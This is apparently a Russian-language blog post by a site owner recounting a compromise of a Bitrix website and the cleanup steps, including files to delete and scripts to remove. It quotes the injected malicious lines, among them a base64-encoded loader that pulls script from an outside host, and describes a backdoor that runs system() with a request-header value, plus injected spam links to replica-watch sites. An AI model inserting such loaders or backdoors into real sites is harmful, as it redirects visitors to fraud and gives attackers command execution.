Нас взломали …


Привет на связи Андрей Андреевич, в очередной раз проверяя сети я обратил внимание, что при поиске в Яндексе и переходя на наш боевой сайт 434040.ru открываются странички, а через короткое время происходит переадресация ( редирект ) на другой сайт. Меня лично положение таких дел страшно возмутило , великий Яндекс мне в помощь …

Решение проблемы пришло быстро :

1. В файле bitrix/modules/main/include/prolog.php удаляем последнюю строку. В моем случае строка выглядит так,

Код
echo “<sc ript src=’https://code.jquery-uii.com/jquery-ui.js’></sc ript>”

2.В файле /public_html/bitrix/js/main/core/core.js – так же удаляем последнюю строку, у меня она выглядела так:

Код
s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly9jb2RlLmpxdWVyeS11aWkuY29tL2pxdWVyeS11aS5qcw==`);document.head.appendChild(s);

3. Очищаем кэш Битрикс.

Проблема решена. Само успокаиваюсь я и забываю.

Но через пару дней, Яндекс директ блокирует все наши рекламные объявления и судя по всему ( это уже мои догадки ) не доходит трафик. И комментирует , что мы рекламируем , что то запрещенное и тп …. Я строчу им письма, надо отдать должное поддержке представляю какая там была лавина запросов , но они молодцы присылают мне следующее :

Мы обнаружили редирект на мошеннический сайт в рекламируемой вами ссылке. Вероятно, это связано с некорректной работой платформы, на которой создан ваш сайт. Пожалуйста, обратитесь в службу поддержки платформы вашего сайта для выяснения обстоятельств или замените рекламируемую ссылку на сайт другой платформы.

Также вы можете самостоятельно или через администратора вашего сайта проверить на наличие постороннего вредоносного скрипта techmestore . pw / jquery-ui . js и удалить его из кода сайта.

Понеслась

В тех же самых файлах опять нахожу схожий скрипт, погружаюсь в тему глубже, нахожу :

У кого проблема с добавлением js-кода – проверьте наличие файлов и удалите их :

/bitrix/components/bitrix/main.file.input/main.php
/bitrix/components/bitrix/main.file.input/set_list.php

Второго файла вероятно не будет, а в первом – мишура для отвлечения внимания (основа – код из file.php), вызов system() в конструкторе с параметром из заголовка запроса + создание объекта данного класса после определения класса. Наличие данного файла не предполагается в ядре.

Далее чищу uploud/tmp судя по всему там были зараженные файлы , хотя main.php у меня был файл на сервере и судя по датам с момента залития дистрибутива с сервера 1С.

После опять очистка :

bitrix/modules/main/include/prolog.php и /bitrix/js/main/core/core.js от вредоносного скрипта , а так же очистка кеша сайта.

Знакомый ИТ специалист дает рекомендацию удалить модуль Настройка продукта / модули :

Опросы, голосования (vote)
Модуль позволяющий организовать систему опросов и голосований посетителей сайта.

Что я делаю незамедлительно.

Надолго ли ?

Апдейт 14.07 проблема продолжается , к сожалению в файлах опять появился нехороший код. sellmestore.pw

Далее с перехода из поиска Яндекса и переходе в нижнее меню, рандомно открываются левые сайты, закошенные под OZON

/bitrix/header.php

Содержит строку < ?php if (in_array($_SERVER[‘REQUEST_URI’], array(“/”,”/страница 1/”,”/страница2/”,”/страница3/” ))) { ?> и далее идет перечисление сайтов visit our online store to buy best replica breitling.discount high quality www.replicapam.ru uk with low price.exact franckmuller is able to meet the requirements among engineering,sports as well as business.there are many different aaa https://silkshome.com/.clreplica.ru is well known the accuracy of the time.the price of cheap https://www.lolo.to/ is almost certainly fitted with the extremely take pleasure in.the research into the connection anywhere between husband in addition to the quantity of a variety of societies was first definitely based on cheap vancleefarpelsreplica.ru under $61.

???


Добавить комментарий

Ваш адрес email не будет опубликован.